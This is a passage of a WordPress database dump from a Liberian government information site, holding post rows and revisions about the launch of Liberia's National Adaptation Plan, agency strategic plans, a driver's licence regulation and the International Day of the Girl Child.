fisheries.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking further, Dr. Chambers said like other countries in the world, Liberia is experiencing climate change and noted “the contemporary climate change today includes both global warming caused by humans, and its impacts on earth’s weather patterns.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to him, there have been previous periods of climate change, but the current changes are more rapid than any known events in earth’s history.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaker Chambers noted that the sensitivity of Liberia’s biophysical features to climate change and the level of vulnerability of each sector is being left and observed.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to him, projections of future trends for temperature and precipitation show that Liberia will continue to be affected by changing climatic conditions.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Global Climate Modeling (GCM) data indicates that the main annual temperature is projected to increase by 1.8 degree Celsius between 2040-2059, while monthly precipitation is projected to decrease by 1.3 mm per month in the 2040-2059 period,” Speaker Chambers said&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“While this is alarming, it requires our collective action and decision to make a change and save our environment. There’s no doubt that resilient and inclusive infrastructure can help change lives. And by changing our habits, as communities and people, we can surely tackle the climate emergency and build a sustainable,” he added.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaker Chambers acknowledges that Liberia has taken another big step by formulating the NAP, which serves as a 10-year strategic plan through 2030.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He disclosed that the NAP document aligns with and supports Liberia’s Vision 2030 Agenda and the Pro-Poor Agenda for Prosperity and Development (PAPD).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For his part, EPA Executive Director, Prof. Wilson K. Tarpeh said that the NAP is intended to address Liberia’s medium and long term climate change adaptation interventions in order to strengthen the country’s resilience against climate change.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He disclosed that the development of Liberia’s NAP took into consideration six climate sensitive sectors including agriculture, coastal resources, energy, fisheries, forestry and waste.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Prof. Tarpeh indicated that the level of vulnerability of these sectors were assessed and appropriate adaptation actions identified along with the required funding.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“I am pleased to account of some of the major achievable milestones during the development of Liberia’s NAP. They are: Training of more than 100 persons in Climate Risk Vulnerability Assessment at the community levels; Overseas Training in Israel in the area of Agriculture Adaptation, Disaster Management and Prevention; Development of a Gender Strategy; Development of concept notes in various sectors for possible climate funding; Development of the curricula and the Establishment of the Graduate School of Environmental Science, Climate Change and Biodiversity at the University of Liberia,” he disclosed. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Prof. Tarpeh lauded the Green Climate Fund (GCF) and United Nations Development Program (UNDP) for supporting the NAP process.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Thanks to the ‘team of developers’ for the level of professional work done to give Liberia a clear direction in adapting to the challenges of climate change across the country,” the EPA Boss concluded.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The launch of the NAPs and AdComs attracted several government officials, sector representatives and stakeholders involved in the NAP.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":4531,\"width\":515,\"height\":486,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/12/Dr-Chambers.jpg\" alt=\"\" class=\"wp-image-4531\" width=\"515\" height=\"486\"/></figure>\n<!-- /wp:image -->','Speaker Chambers Launches Liberia’s National Adaptation Plan','','publish','open','open','','speaker-chambers-launches-liberias-national-adaptation-plan','','','2021-12-17 11:26:57','2021-12-17 11:26:57','',0,'https://ekmsliberia.info/?p=4529',144,'post','',0),(4530,42,'2021-12-17 11:20:56','2021-12-17 11:20:56','','Speaker-Chambers-Prof-Tarpeh','','inherit','open','closed','','speaker-chambers-prof-tarpeh','','','2021-12-17 11:20:56','2021-12-17 11:20:56','',4529,'https://ekmsliberia.info/wp-content/uploads/2021/12/Speaker-Chambers-Prof-Tarpeh.jpg',0,'attachment','image/jpeg',0),(4531,42,'2021-12-17 11:22:12','2021-12-17 11:22:12','','Dr-Chambers','','inherit','open','closed','','dr-chambers','','','2021-12-17 11:22:12','2021-12-17 11:22:12','',4529,'https://ekmsliberia.info/wp-content/uploads/2021/12/Dr-Chambers.jpg',0,'attachment','image/jpeg',0),(4532,42,'2021-12-17 11:23:23','2021-12-17 11:23:23','<!-- wp:image {\"id\":4530,\"width\":492,\"height\":377,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large is-resized\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/12/Speaker-Chambers-Prof-Tarpeh-1024x787.jpg\" alt=\"\" class=\"wp-image-4530\" width=\"492\" height=\"377\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p><em><u>Dr. Chambers chatting with Prof. Tarpeh at the ceremony</u></em></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Speaker of the House of Representatives, Dr. Bhofal Chambers has disclosed that Liberia’s economy, population and environment are highly susceptible to climate change vulnerability and therefore called on every citizen to take actions and measures to promote adaptation to reduce climate change risk.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking at the launch of Liberia’s National Adaptation Plan (NAP) Adaptation Communication (AdCom) on Wednesday 8 December 2021 at the Corina Hotel in Sinkor, Dr. Chambers said reduction of climate change risk requires stronger commitment and collaboration from all sectors at all stages.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Liberia’s National Adaptation Plan is intended to help Liberia tackle the issue of climate change through a sound adaptation program that involves a whole of society approach to achieve the goal, vision and specific objectives.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>It was developed through a consultative multi-stakeholder process and informed by sectoral climate vulnerability and risk assessments, and the disaster risk assessment.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The NAP focuses on six sectors that are priorities of the Government of Liberia in its efforts to adapt to the impacts of climate change: agriculture, coastal zones, forestry, energy, waste management and fisheries.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking further, Dr. Chambers said like other countries in the world, Liberia is experiencing climate change and noted “the contemporary climate change today includes both global warming caused by humans, and its impacts on earth’s weather patterns.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to him, there have been previous periods of climate change, but the current changes are more rapid than any known events in earth’s history.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaker Chambers noted that the sensitivity of Liberia’s biophysical features to climate change and the level of vulnerability of each sector is being left and observed.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to him, projections of future trends for temperature and precipitation show that Liberia will continue to be affected by changing climatic conditions.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Global Climate Modeling (GCM) data indicates that the main annual temperature is projected to increase by 1.8 degree Celsius between 2040-2059, while monthly precipitation is projected to decrease by 1.3 mm per month in the 2040-2059 period,” Speaker Chambers said&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“While this is alarming, it requires our collective action and decision to make a change and save our environment. There’s no doubt that resilient and inclusive infrastructure can help change lives. And by changing our habits, as communities and people, we can surely tackle the climate emergency and build a sustainable,” he added.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaker Chambers acknowledges that Liberia has taken another big step by formulating the NAP, which serves as a 10-year strategic plan through 2030.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He disclosed that the NAP document aligns with and supports Liberia’s Vision 2030 Agenda and the Pro-Poor Agenda for Prosperity and Development (PAPD).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For his part, EPA Executive Director, Prof. Wilson K. Tarpeh said that the NAP is intended to address Liberia’s medium and long term climate change adaptation interventions in order to strengthen the country’s resilience against climate change.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He disclosed that the development of Liberia’s NAP took into consideration six climate sensitive sectors including agriculture, coastal resources, energy, fisheries, forestry and waste.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Prof. Tarpeh indicated that the level of vulnerability of these sectors were assessed and appropriate adaptation actions identified along with the required funding.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“I am pleased to account of some of the major achievable milestones during the development of Liberia’s NAP. They are: Training of more than 100 persons in Climate Risk Vulnerability Assessment at the community levels; Overseas Training in Israel in the area of Agriculture Adaptation, Disaster Management and Prevention; Development of a Gender Strategy; Development of concept notes in various sectors for possible climate funding; Development of the curricula and the Establishment of the Graduate School of Environmental Science, Climate Change and Biodiversity at the University of Liberia,” he disclosed. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Prof. Tarpeh lauded the Green Climate Fund (GCF) and United Nations Development Program (UNDP) for supporting the NAP process.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Thanks to the ‘team of developers’ for the level of professional work done to give Liberia a clear direction in adapting to the challenges of climate change across the country,” the EPA Boss concluded.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The launch of the NAPs and AdComs attracted several government officials, sector representatives and stakeholders involved in the NAP.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":4531,\"width\":515,\"height\":486,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/12/Dr-Chambers.jpg\" alt=\"\" class=\"wp-image-4531\" width=\"515\" height=\"486\"/></figure>\n<!-- /wp:image -->','Speaker Chambers Launches Liberia’s National Adaptation Plan','','inherit','closed','closed','','4529-revision-v1','','','2021-12-17 11:23:23','2021-12-17 11:23:23','',4529,'https://ekmsliberia.info/?p=4532',0,'revision','',0),(4534,42,'2021-12-17 11:25:49','2021-12-17 11:25:49','','NAP Launch','','inherit','open','closed','','nap-launch','','','2021-12-17 11:25:49','2021-12-17 11:25:49','',4529,'https://ekmsliberia.info/wp-content/uploads/2021/12/NAP-Launch.jpg',0,'attachment','image/jpeg',0),(4537,42,'2022-01-04 07:49:27','2022-01-04 07:49:27','','epasp','','inherit','open','closed','','screenshot-60','','','2022-01-04 07:49:44','2022-01-04 07:49:44','',0,'https://ekmsliberia.info/wp-content/uploads/2022/01/Screenshot-60.png',0,'attachment','image/png',0),(4538,42,'2022-01-04 07:49:55','2022-01-04 07:49:55','','2022-2026 EPA Strategic Plan','','inherit','open','closed','','2022-2026-epa-strategic-plan','','','2022-01-04 07:49:55','2022-01-04 07:49:55','',0,'https://ekmsliberia.info/wp-content/uploads/2022/01/2022-2026-EPA-Strategic-Plan.pdf',0,'attachment','application/pdf',0),(4540,42,'2022-01-04 07:53:37','2022-01-04 07:53:37','I am delighted to present the Strategic Plan for the Liberia Maritime Authority. We have retained our strong international brand and we are determined to develop a best in class domestic and international maritime operation. We foresee this sector becoming a major income generator that will underpin the vibrancy of the Liberian economy.\nThe strategic planning process over the last several months has realigned our focus and resources to make strategic choices and craft specific and measurable goals and objectives which are in line with attaining our five (5) year vision of “Building a vibrant domestic maritime program that is financially self-sustaining, internationally compliant, and effective in protecting our maritime domain”.\nIn order to accomplish this, we need foresight and adaptability from all our partners and stakeholders. Technology, Tourism and Trade are key to our continued growth. We need to embrace innovation and ensure we continue to build a sustainable marine environment.','Liberia Martime Authority Multi Year Strategic Plan 2019-2023','','inherit','closed','closed','','2989-autosave-v1','','','2022-01-04 07:53:37','2022-01-04 07:53:37','',2989,'https://ekmsliberia.info/?p=4540',0,'revision','',0),(4541,42,'2022-01-04 07:53:51','2022-01-04 07:53:51','I am delighted to present the Strategic Plan for the Liberia Maritime Authority. We have retained our strong international brand and we are determined to develop a best in class domestic and international maritime operation. We foresee this sector becoming a major income generator that will underpin the vibrancy of the Liberian economy.\r\nThe strategic planning process over the last several months has realigned our focus and resources to make strategic choices and craft specific and measurable goals and objectives which are in line with attaining our five (5) year vision of “Building a vibrant domestic maritime program that is financially self-sustaining, internationally compliant, and effective in protecting our maritime domain”.\r\nIn order to accomplish this, we need foresight and adaptability from all our partners and stakeholders. Technology, Tourism and Trade are key to our continued growth. We need to embrace innovation and ensure we continue to build a sustainable marine environment.','Liberia Martime Authority Multi Year Strategic Plan 2019-2023','','inherit','closed','closed','','2989-revision-v1','','','2022-01-04 07:53:51','2022-01-04 07:53:51','',2989,'https://ekmsliberia.info/?p=4541',0,'revision','',0),(4542,42,'2022-01-04 09:30:11','2022-01-04 09:30:11','The environment is intrinsically linked to human survival and development. It impacts human welfare. Reversely, human activities also affect the environment. Climate Change, due to human activities, and its ramifications around the world in 2021 has pronounced the significance of environmental issues and the urgent need for global actions towards protection of the environment. The Environmental Protection Agency (EPA) is the institution in Liberia charged with the responsibility of protecting the environment. The Agency has developed this Strategic Plan for the next five years (2022 – 2026) to direct environmental governance and management in Liberia. This Executive Summary sets out the Focal Areas and Strategic Directions the Agency has purposefully chosen to take in those areas during this period, as well as the key actions and activities that will accomplish them.','Environmental Protection Agency Strategic Plan for 2022 - 2026','','publish','closed','closed','','environmental-protection-agency-strategic-plan-for-2022-2026','','','2022-01-06 14:02:42','2022-01-06 14:02:42','',0,'https://ekmsliberia.info/?post_type=document&#038;p=4542',66,'document','',0),(4543,42,'2022-01-04 09:30:11','2022-01-04 09:30:11','The environment is intrinsically linked to human survival and development. It impacts human welfare. Reversely, human activities also affect the environment. Climate Change, due to human activities, and its ramifications around the world in 2021 has pronounced the significance of environmental issues and the urgent need for global actions towards protection of the environment. The Environmental Protection Agency (EPA) is the institution in Liberia charged with the responsibility of protecting the environment. The Agency has developed this Strategic Plan for the next five years (2022 – 2026) to direct environmental governance and management in Liberia. This Executive Summary sets out the Focal Areas and Strategic Directions the Agency has purposefully chosen to take in those areas during this period, as well as the key actions and activities that will accomplish them.','Environmental Protection Agency Strategic Plan for 2022 - 2026','','inherit','closed','closed','','4542-revision-v1','','','2022-01-04 09:30:11','2022-01-04 09:30:11','',4542,'https://ekmsliberia.info/?p=4543',0,'revision','',0),(4546,42,'2022-01-13 12:07:13','2022-01-13 12:07:13','This document outlines the new regulations for obtaining new, missing, expired, or damaged driver\'s licenses effective January 2022.','Driver\'s License New Regulation January 2022','','publish','closed','closed','','drivers-license-new-regulation-january-2022','','','2022-01-13 12:07:13','2022-01-13 12:07:13','',0,'https://ekmsliberia.info/?post_type=document&#038;p=4546',65,'document','',0),(4547,42,'2022-01-13 12:05:49','2022-01-13 12:05:49','','MOT','','inherit','open','closed','','screenshot-62','','','2022-01-13 12:06:00','2022-01-13 12:06:00','',4546,'https://ekmsliberia.info/wp-content/uploads/2022/01/Screenshot-62.png',0,'attachment','image/png',0),(4548,42,'2022-01-13 12:06:20','2022-01-13 12:06:20','','DRIVER LICENSE REGULATION','','inherit','open','closed','','driver-license-regulation','','','2022-01-13 12:06:20','2022-01-13 12:06:20','',4546,'https://ekmsliberia.info/wp-content/uploads/2022/01/DRIVER-LICENSE-REGULATION.pdf',0,'attachment','application/pdf',0),(4549,42,'2022-01-13 12:07:13','2022-01-13 12:07:13','This document outlines the new regulations for obtaining new, missing, expired, or damaged driver\'s licenses effective January 2022.','Driver\'s License New Regulation January 2022','','inherit','closed','closed','','4546-revision-v1','','','2022-01-13 12:07:13','2022-01-13 12:07:13','',4546,'https://ekmsliberia.info/?p=4549',0,'revision','',0),(4550,42,'2022-01-13 12:07:20','2022-01-13 12:07:20','This document outlines the new regulations for obtaining new, missing, expired, or damaged driver\'s licenses effective January 2022.','Driver\'s License New Regulation January 2022','','inherit','closed','closed','','4546-autosave-v1','','','2022-01-13 12:07:20','2022-01-13 12:07:20','',4546,'https://ekmsliberia.info/?p=4550',0,'revision','',0),(4551,42,'2021-10-11 16:16:00','2021-10-11 16:16:00','<!-- wp:paragraph -->\n<p>(Monrovia, Liberia - October 12, 2021) As countries around the world leaf through the pages of history to give flowers and pay special homage to the Girl Child, Liberia is of no exception in that marathon journey for girls’ freedom and dignity. The Minister of Gender, Children and Social Protection, Madam Williametta Saydee-Tarr is pushing for girls to acquire digital knowledge so as to grapple with present day realities and engage into meaningful ventures that will improve their lives.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Minister Saydee-Tarr stressed that as the world slowly but steadily recovers from the COVID-19 Pandemic which has wrecked some of the strongest and most organized systems on the planet, she is concerned about how learning opportunities can be increased, connectivity expanded to reduce poverty through the utilization of various digital platforms.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>She said that in order to bridge the digital gap, governments should begin to provide opportunities for girls to acquire education in the digital sector by supporting programs in schools. According to Minister Tarr, without access to education, girls cannot get enlightened and their boundless potentials will not be fulfilled.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking, Monday, October 11, 2021, on the historic Tenth edition of the observance of the International Day of the Girl Child, on the Somalia Drive in Paynesville, outside Monrovia, Minister Saydee-Tarr said that in Liberia, majority of school going girls are still yet to have seen or touched a computer and there is a demand for digital education at all level.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Gender Boss mentioned that digital knowledge is now fundamental to the acquisition of jobs and the attainment of stability both in the public and private sectors.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>She said, as a government - they are pleased with the growing number of technical schools that are strictly concentrated on providing primary and advanced digital education for citizenry.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On October 11, 2012, the United Nations declared October 11th every year to be internationally observed as International Day of the Girl.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Day is being commemorated under the global theme,” Digital Generation, and the national theme is, “Bridging Digital Gap for Girls in Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Minister Tarr assured the gathering that the conversations being held will be elevated to the level of Cabinet, so as to ensure that the government increases the level of support to the digital sector. She also used the occasion to call on partners to make the digital revolution possible.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Touching on other issues, she said that girls continue to be subjected to discrimination, forced and early child marriage and victims of sexual and domestic violence, and it is important to emphasize that the empowerment of girls is central to economic growth and the eradication of global poverty.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Minister Saydee-Tarr indicated that It is not only imperative that governments continue to expand empowerment opportunities for girls but it is also mandatory for governments to ensure that girls take a front role seat on the table of decision making.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Gender, Children and Social Protection Boss mentioned that by doing so, it will break the cycle of discrimination and violence against girls and promote the full and effective protection of girls’ human rights.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>She urged girls to dream and stand up for their rights and garner the necessary abilities that will improve their living conditions thereby putting them on par with their colleagues globally.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>&nbsp;“The story of the Liberian Girl Child is rife with challenges, but the Liberian Girl Child persists! Given the opportunity, she will continue to dare to conquer challenges in her life. All she needs is that booster from the adults around her, the Governments and partners who believe in her”, Minister Saydee-Tarr added.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Delivering the keynote address, Miss Mariah James, a member of the Adolescent Girls\' Advisory Panel (AGAP) said, digital gap is the difference between group with access to technology and those without.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>She mentioned that in Liberia and many parts of the world, girls often have little or no access to technology and the internet as compared to boys and Girls in Liberia and that girls have to struggle for easy access to technology and the internet.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>She noted&nbsp; that owing to such situation,&nbsp; it has made many to believe that technology and the internet is only reserved for the male counterpart in the country.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>She believes that girls\' inability to understand the usage of technology serves as major stereotypes. Miss James stressed that if it is not addressed, young women will continue to be denied employment opportunities.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Orator of the International Day of the Girl Child said that the ability to access and use technology has become paramount and technology provides great opportunity, particularly in developing countries, and has the potential to promote inclusion, providing greater access to information and services by reaching more people in more places.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The key note speaker noted that when principles of inclusion are not applied, technology risks perpetuating existing inequalities and further alienating under-served populations who cannot access, afford, or have the skills and education to use technology, exacerbating a digital divide.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to her, when developing or promoting new technologies and digital solutions, governments need to consider these broader implications and address the critical barriers.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Orator pointed out that technological advancements are rapid, and “90% of future jobs will require digital competencies” according to European Commission Report and&nbsp; this may result in a further increase of the gender gap that already exists in several spheres including education, politics, and income between boys and girls.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Gender Advocate stressed that the message is a wake-up call to everyone, leaders, stakeholders, government officials, citizens, and humanitarians, and without equal access to technology and the internet, girls in Liberia will not participate in the digital world or global village.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>\"If Liberian girls are not provided the opportunity, it will affect their lives in different ways, it will cripple their voices and stop them from speaking on matters that concern them. Furthermore, if the girls of Liberia are not involved in creating digital tools and online contents, they cannot reach their full potentials and this may affect their future opportunities or space to perform in the job market”. The key note speaker stressed.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Also speaking, the Deputy Representative of the United Nations Children Educational Fund, ( UNICEF) to Liberia Amadou Alassane Cisse use the occasion to convey UNICEF’s thanks and appreciations to the Ministry of Gender, Children and Social Protection, the Adolescent Girls Working Group, other sister UN Agencies and development partners for organizing the event.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mr. Cisse indicated that every year October 11 the International Day of Girl Child, UNICEF and partners work to amplify their voices and stand up for girls’ rights.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“We are reminded of our collective responsibilities as duty bearers to accelerate investment in the digital platform for learning, earning, and connecting people” the UNICEF Deputy Rep indicated.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For his part, Dr. Ufuoma Omo-Obi, Country Director, PLAN International, also extended Plan International appreciation for the high level of coordination from the Ministry of Gender, Children and Social Protection.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Ambassador Obi said with this year’s theme:” Digital Generation, Our Generation and the National Theme: Bridging Digital Gaps for Girls in Liberia, it is meant to support girl and young women around the world to amplify their voices rejecting all gender stereotypes dictating what they can do.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He said that Plan International stands with girls and young women in calling for transformative education to end gender stereotypes, so all children can be themselves and be safe no matter their identity, whether online or in the classrooms.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This year\'s International Day of the Girl Child according to the Ministry of Gender, Children and Social Protection was supported by UNICEF, Medica Liberia, Plan International, International Rescue Committee (IRC), United Funding and Development for Underage Mothers (UFDUM), Liberia Association of Psychosocial Services (LAPS) and Defense for Children Liberia.</p>\n<!-- /wp:paragraph -->','Ministry of Gender, Children and Social Protection Celebrates The International Day of the Girl Child','','publish','closed','closed','','ministry-of-gender-children-and-social-protection-celebrates-the-international-day-of-the-girl-child','','','2022-01-13 12:21:22','2022-01-13 12:21:22','',0,'https://ekmsliberia.info/?p=4551',143,'post','',0),(4552,42,'2022-01-13 12:19:38','2022-01-13 12:19:38','','gender news','','inherit','open','closed','','gender-news','','','2022-01-13 12:19:38','2022-01-13 12:19:38','',4551,'https://ekmsliberia.info/wp-content/uploads/2022/01/gender-news-.png',0,'attachment','image/png',0),(4553,42,'2022-01-13 12:20:10','2022-01-13 12:20:10','<!-- wp:paragraph -->\n<p>(Monrovia, Liberia - October 12, 2021) As countries around the world leaf through the pages of history to give flowers and pay special homage to the Girl Child, Liberia is of no exception in that marathon journey for girls’ freedom and dignity. The Minister of Gender, Children and Social Protection, Madam Williametta Saydee-Tarr is pushing for girls to acquire digital knowledge so as to grapple with present day realities and engage into meaningful ventures that will improve their lives.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Minister Saydee-Tarr stressed that as the world slowly but steadily recovers from the COVID-19 Pandemic which has wrecked some of the strongest and most organized systems on the planet, she is concerned about how learning opportunities can be increased, connectivity expanded to reduce poverty through the utilization of various digital platforms.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>She said that in order to bridge the digital gap, governments should begin to provide opportunities for girls to acquire education in the digital sector by supporting programs in schools. According to Minister Tarr, without access to education, girls cannot get enlightened and their boundless potentials will not be fulfilled.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking, Monday, October 11, 2021, on the historic Tenth edition of the observance of the International Day of the Girl Child, on the Somalia Drive in Paynesville, outside Monrovia, Minister Saydee-Tarr said that in Liberia, majority of school going girls are still yet to have seen or touched a computer and there is a demand for digital education at all level.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Gender Boss mentioned that digital knowledge is now fundamental to the acquisition of jobs and the attainment of stability both in the public and private sectors.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>She said, as a government - they are pleased with the growing number of technical schools that are strictly concentrated on providing primary and advanced digital education for citizenry.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On October 11, 2012, the United Nations declared October 11th every year to be internationally observed as International Day of the Girl.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Day is being commemorated under the global theme,” Digital Generation, and the national theme is, “Bridging Digital Gap for Girls in Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Minister Tarr assured the gathering that the conversations being held will be elevated to the level of Cabinet, so as to ensure that the government increases the level of support to the digital sector. She also used the occasion to call on partners to make the digital revolution possible.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Touching on other issues, she said that girls continue to be subjected to discrimination, forced and early child marriage and victims of sexual and domestic violence, and it is important to emphasize that the empowerment of girls is central to economic growth and the eradication of global poverty.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Minister Saydee-Tarr indicated that It is not only imperative that governments continue to expand empowerment opportunities for girls but it is also mandatory for governments to ensure that girls take a front role seat on the table of decision making.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Gender, Children and Social Protection Boss mentioned that by doing so, it will break the cycle of discrimination and violence against girls and promote the full and effective protection of girls’ human rights.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>She urged girls to dream and stand up for their rights and garner the necessary abilities that will improve their living conditions thereby putting them on par with their colleagues globally.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>&nbsp;“The story of the Liberian Girl Child is rife with challenges, but the Liberian Girl Child persists! Given the opportunity, she will continue to dare to conquer challenges in her life. All she needs is that booster from the adults around her, the Governments and partners who believe in her”, Minister Saydee-Tarr added.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Delivering the keynote address, Miss Mariah James, a member of the Adolescent Girls\' Advisory Panel (AGAP) said, digital gap is the difference between group with access to technology and those without.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>She mentioned that in Liberia and many parts of the world, girls often have little or no access to technology and the internet as compared to boys and Girls in Liberia and that girls have to struggle for easy access to technology and the internet.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>She noted&nbsp; that owing to such situation,&nbsp; it has made many to believe that technology and the internet is only reserved for the male counterpart in the country.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>She believes that girls\' inability to understand the usage of technology serves as major stereotypes. Miss James stressed that if it is not addressed, young women will continue to be denied employment opportunities.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Orator of the International Day of the Girl Child said that the ability to access and use technology has become paramount and technology provides great opportunity, particularly in developing countries, and has the potential to promote inclusion, providing greater access to information and services by reaching more people in more places.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The key note speaker noted that when principles of inclusion are not applied, technology risks perpetuating existing inequalities and further alienating under-served populations who cannot access, afford, or have the skills and education to use technology, exacerbating a digital divide.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to her, when developing or promoting new technologies and digital solutions, governments need to consider these broader implications and address the critical barriers.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Orator pointed out that technological advancements are rapid, and “90% of future jobs will require digital competencies” according to European Commission Report and&nbsp; this may result in a further increase of the gender gap that already exists in several spheres including education, politics, and income between boys and girls.</p>\n<!-- /wp:paragraph -->\n\n<!-- 